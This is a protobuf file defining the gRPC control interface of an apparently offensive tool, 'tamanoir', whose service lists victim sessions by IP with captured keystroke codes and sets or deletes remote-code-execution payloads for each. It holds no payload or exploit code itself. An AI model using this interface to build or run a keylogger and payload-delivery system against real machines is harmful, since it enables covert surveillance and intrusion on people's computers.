tamanoir-common/proto/tamanoir/tamanoir.proto

syntax = "proto3";

package tamanoir;


message Empty {}


message ListSessionsResponse {
  repeated SessionResponse sessions = 1;
}

message SessionRcePayload {
  string name=1;
  string target_arch=2;
  uint32 length=3;
  uint32 buffer_length =4;
}
message SessionResponse {
  string ip =1;
  repeated uint32 key_codes=2; 
  SessionRcePayload rce_payload=3;
}
message SetSessionRceRequest {
  string ip=1;
  string rce=2;
  string target_arch=3; 
}
message DeleteSessionRceRequest {
  string ip=1;
}

service Proxy {
  rpc ListSessions (Empty) returns ( ListSessionsResponse) {}
  rpc WatchSessions (Empty) returns ( stream SessionResponse) {}
  rpc SetSessionRce (SetSessionRceRequest) returns (Empty) {}
  rpc DeleteSessionRce (DeleteSessionRceRequest) returns (Empty) {}
}